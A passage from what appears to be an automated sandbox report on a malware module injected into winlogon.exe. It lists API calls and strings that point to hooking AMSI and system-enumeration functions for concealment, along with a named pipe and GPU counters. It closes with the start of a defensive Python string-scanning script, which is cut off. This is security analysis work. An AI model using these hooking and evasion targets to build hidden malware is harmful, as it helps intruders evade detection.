                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E1754
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E176F
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E178F
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E17AA
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E17CA
                                                          • SleepEx.KERNELBASE ref: 000002D0165E1AE3
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E17E5
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E1805
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1820
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E1840
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E185B
                                                            • Part of subcall function 000002D0165E1628: RegOpenKeyExW.KERNELBASE ref: 000002D0165E187B
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.ADVAPI32 ref: 000002D0165E1896
                                                            • Part of subcall function 000002D0165E1628: RegCloseKey.KERNELBASE ref: 000002D0165E18A0
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction ID: 66e44494c7f656fe3ce444e5f8e737549d0e8d4baeb9513a9da4fbab288e4862
                                                          • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction Fuzzy Hash: 20310561E1068142FF709BA6DDD83EEB2A9AB84BC6F8450239E0D877B5EE15CD50C350

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction ID: 5e41e87b92a480212ae126d1164da57dd18493b5820a26e260cb34e0e6ffb87d
                                                          • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction Fuzzy Hash: EFB17366210AE589EF648FA5DD897A9F3A4FB44BC4F849017EE0D537A8DB36CE40C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction ID: 3f62921a25067518e1bfaa809f1cb7c698419ab88e171b7c7778bf021c1d484d
                                                          • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction Fuzzy Hash: BC314F72205BC08AEB609FA0EC947ED7374F784744F84442ADA4E57BA4DF39CA48C710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction ID: e5481f02f8261cb671bd9619e00b5a5215ab25be7af4c76cbfe084d40dae703c
                                                          • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction Fuzzy Hash: 3C315F36214FC086EB60CFA5EC8439E73A4F788754F940226EA9D47BA4DF39CA55CB00

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 000002D0165E1D4B
                                                            • Part of subcall function 000002D0165E20C4: GetModuleHandleA.KERNEL32(?,?,?,000002D0165E1D7D), ref: 000002D0165E20DC
                                                            • Part of subcall function 000002D0165E20C4: GetProcAddress.KERNEL32(?,?,?,000002D0165E1D7D), ref: 000002D0165E20ED
                                                            • Part of subcall function 000002D0165E5F60: GetCurrentThreadId.KERNEL32 ref: 000002D0165E5F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 4175298099-4225371247
                                                          • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction ID: 42fe4f969bd3097bf71423927041cf8a4865869a26dc220f04bef47a29d86233
                                                          • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction Fuzzy Hash: 38416EA11009CAA4EF04EFE4ECEA7D46365BB40394FC09567A52D031B9AE7ACF4ED351

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction ID: 8535c3407c90ca8d0a1e78cd43edddb1639353b3d75649769dad88b98a535dd3
                                                          • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction Fuzzy Hash: 55514072200B9486EB64CFA2E88C79AB7A1F788F99F444126DA4D07768DF3CC949C710
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: destructor'$ned$restrict(
                                                          • API String ID: 190073905-924718728
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: 10352f3621cfb05593126c12a9e106e399346f652ce8e41f9483bb92b936fa18
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: B981D3216102D286FB609BE79CCD36E23D8AB95788FD44027AA0D47FB6EF39CD518710

                                                          Control-flow Graph

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED267
                                                          • FlsGetValue.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED27C
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED29D
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED2CA
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED2DB
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED2EC
                                                          • SetLastError.KERNEL32(?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED307
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED33D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,000002D0165EF0FC,?,?,?,?,000002D0165EC3CF,?,?,?,?,?,000002D0165E7EE0), ref: 000002D0165ED35C
                                                            • Part of subcall function 000002D0165EDAFC: HeapAlloc.KERNEL32(?,?,00000000,000002D0165ED432,?,?,?,000002D0165EDAE5,?,?,?,?,000002D0165EDBA8), ref: 000002D0165EDB51
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED384
                                                            • Part of subcall function 000002D0165EDB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002D0165E643A), ref: 000002D0165EDB8A
                                                            • Part of subcall function 000002D0165EDB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002D0165E643A), ref: 000002D0165EDB94
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED395
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D0165F0E9B,?,?,?,000002D0165F088C,?,?,?,000002D0165ECC7F), ref: 000002D0165ED3A6
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                          • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction ID: 43972d606b00cc2be28d3e2c33b0ce1b5ff9d5d7083995bf257bda57e6b2045b
                                                          • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction Fuzzy Hash: 1C4185223452C442FF58A7F95DDD36DE2425B497B0FD4572BA83E0A7F6DE2ACE418200

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction ID: 9399f2a70220d5fc83846a100c734f2598ba77da802c8d91112e16fcd82e6b36
                                                          • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction Fuzzy Hash: D2319332A04A9086FB20CFA2AC8C759F3A0F788B95F844566DE4D43A75DF38CA558740

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction ID: b0b4c6f7df39834c1d93ccae1f79ff724c4c6fff3a16477284ecea33b86cda3e
                                                          • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction Fuzzy Hash: 5D316D21A14B9186FB54DFA6ACCCB59B3A0B784F85F84412A9E8E43775DF38CD458700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000003.2231390678.000002D016580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_3_2d016580000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction ID: b40527c8b914558b478dfab4642fda96873c4a3b82ba89e511e1485228043c09
                                                          • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction Fuzzy Hash: 32E18372604BC08AEB20DFA6D88839D77A8F755B98F900116EE8D57FA5CB38C991C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction ID: 17b2e46a5adb7301b2a16f1b18d056b7e51783f2a98078d2ad4c8b0d1243037a
                                                          • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction Fuzzy Hash: D5E18172604BC08AEF20DFB5D98839DB7A4F745B98F944516EE8D57BA9CB35CA80C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction ID: 0502c5113662f2a3a9a5d4d251263c5911824315a05688cff6cf68844e12e38b
                                                          • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction Fuzzy Hash: 2841F321315A8091FF16CFAAAC88755A395BB45BA0FC8412B9D4E877A4EF3ACE45C340
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction ID: 57c1a81412e766fec711e6397f0191dcb9f2e6ca8c99996e7c9a6a9e6f97b5bd
                                                          • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction Fuzzy Hash: 2B416573614BC0C6EB64CFA1E84879EB7A1F388B99F448116DA8D07768DF39C945CB40
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,000002D0165ECC0E,?,?,?,?,?,?,?,?,000002D0165ED3CD,?,?,00000001), ref: 000002D0165ED4B7
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165ECC0E,?,?,?,?,?,?,?,?,000002D0165ED3CD,?,?,00000001), ref: 000002D0165ED4D6
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165ECC0E,?,?,?,?,?,?,?,?,000002D0165ED3CD,?,?,00000001), ref: 000002D0165ED4FE
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165ECC0E,?,?,?,?,?,?,?,?,000002D0165ED3CD,?,?,00000001), ref: 000002D0165ED50F
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D0165ECC0E,?,?,?,?,?,?,?,?,000002D0165ED3CD,?,?,00000001), ref: 000002D0165ED520
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction ID: c9533fc29eaa90fd43d0fafe31dbb0b9db58d701bccea4bab299a4df71c1c529
                                                          • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction Fuzzy Hash: 491181227452C441FF5897E9ADCD339E2419B843B4FC4432BE83E0A6F6DE2ACE424600
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000032.00000002.3448686152.000002D0165E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                           • Associated: 00000032.00000002.3448572183.000002D0165E0000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448840592.000002D0165F6000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3448901031.000002D016601000.00000004.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449005210.000002D016603000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 00000032.00000002.3449145667.000002D016609000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_50_2_2d0165e0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\dialerchildproc
                                                          • API String ID: 166002920-1933775637
                                                          • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction ID: 486f21b42584047a8dbd0fd249b04f4d120b002e740eb6a919f711e2c29be054
                                                          • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction Fuzzy Hash: 3F115E32614B9083E710CB61F88875A7765F389BE5F904316EA5E02BA8CFBCC948CB04
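The function entries above expose the strings that actually distinguish the module injected into winlogon.exe: the named pipe `\\.\pipe\dialerchildproc` referenced next to CreateFile/ReadFile/WriteFile, the performance-counter paths `\GPU user(*)\Running Time` and `\GPU user(*)\Utilization Percentage`, and the bare token `dialer`. The other String IDs in this listing (`csm`, `api-ms-`, `ext-ms-`, `CONOUT$`) belong to the MSVC C runtime and turn up in every MSVC-linked binary, so they are not worth carrying into a triage scan. The Python script below is an added example, not code from the Joe Sandbox report or from the sample: it searches a file or dumped memory region for those sample-specific strings in both ASCII and UTF-16LE, because the W-suffixed Windows APIs take UTF-16 strings and a naive ASCII grep misses them. `SAMPLE_DUMP` is a constructed stand-in for a memory dump, not data from the report.

```python
import sys
from typing import Dict, List, Tuple

# Strings copied from the "String ID" fields of the winlogon.exe function
# entries in this report. CRT strings the same listing shows (csm, api-ms-,
# ext-ms-, CONOUT$) are left out on purpose: every MSVC-linked binary has them.
SAMPLE_STRINGS: List[str] = [
    r"\\.\pipe\dialerchildproc",
    r"\GPU user(*)\Running Time",
    r"\GPU user(*)\Utilization Percentage",
    "dialer",
]

# Strings handed to the W-suffixed Windows APIs are stored as UTF-16LE, so
# each needle is searched in both encodings.
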